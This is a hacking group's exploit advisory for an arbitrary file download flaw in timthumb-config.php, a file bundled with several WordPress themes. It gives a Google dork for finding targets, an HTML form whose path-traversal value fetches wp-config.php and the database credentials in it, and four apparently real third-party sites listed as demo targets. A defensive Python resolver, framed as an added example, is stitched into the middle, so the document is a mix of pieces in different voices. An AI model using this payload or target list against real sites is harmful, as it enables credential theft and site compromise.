##########################
# Exploit Title: Wordpress Themes Arbitrary File Download timthumb-config.php Vulnerability
# Google Dork : wp-content/themes/lib/timthumb-config.php
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Tested on : Windows7
##########################
# WordPress Multiple Themes Arbitrary File Download: this exploit allows attackers to download
# files from your website. The vulnerable file is timthumb-config.php,
# so any WordPress theme that ships this file is potentially vulnerable.
######################
Exploit :
www.site.com/wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php
#####################
<html>
<body>
<form action="http://www.site.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
<input type="submit">
</form>
</body>
</html>
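The form above reads the `_mysite_download_skin` value as a file path, which is why `../../../../../wp-config.php` escapes the theme directory. As a defender-side illustration added here (not code from the advisory or from any theme), this Python resolver shows how such a lookup can be confined to the theme's skins directory so the traversal is rejected; the directory layout and the `.css` allow-list are assumptions for the demo.

```python
"""Hardened lookup for a theme 'download skin' parameter (added example, not the theme's code).

The vulnerable handler read the _mysite_download_skin path directly. This resolver
percent-decodes once, rejects absolute paths and NUL bytes, resolves '..' and symlinks with
realpath, requires the result to stay under the skins directory, and only serves an
allow-listed extension. The .css allow-list and directory names are assumptions.
"""
import os
import tempfile
from urllib.parse import unquote

ALLOWED_EXT = {".css"}  # assumption: skins are plain CSS files


def resolve_skin_path(base_dir: str, requested: str):
    """Return the real path of the requested skin, or None if it is not a safe file under base_dir."""
    requested = unquote(requested)  # decode once so '..%2f' style input gets the same check
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath collapses '..' and symlinks; the result must remain inside base
    if os.path.commonpath([base, candidate]) != base:
        return None
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Build a throwaway skins dir plus a constructed wp-config.php above it; return (good_ok, bad)."""
    root = tempfile.mkdtemp()
    skins = os.path.join(root, "wp-content", "themes", "demo", "lib", "skins")
    os.makedirs(skins)
    with open(os.path.join(skins, "default.css"), "w") as f:
        f.write("body{}")
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php /* constructed placeholder, not a real config */")
    good = resolve_skin_path(skins, "default.css")
    bad = resolve_skin_path(skins, "../../../../../wp-config.php")
    encoded = resolve_skin_path(skins, "..%2F..%2F..%2F..%2F..%2Fwp-config.php")
    return good is not None, bad, encoded


if __name__ == "__main__":
    print(demo())  # (True, None, None)
```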
##############################
Demo :
http://stepsandwings.net/wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php
http://www.aimmachines.com//wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php
http://www.deepwebtech.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php
http://clarksonjewelers.com/wp-content/themes/elegance/lib/scripts/timthumb/timthumb-config.php
###################################
# Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran || Ormazd || Sh@d0w ||
# MaMaD_Malware || OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||
# And All Of Iranian Anonymous.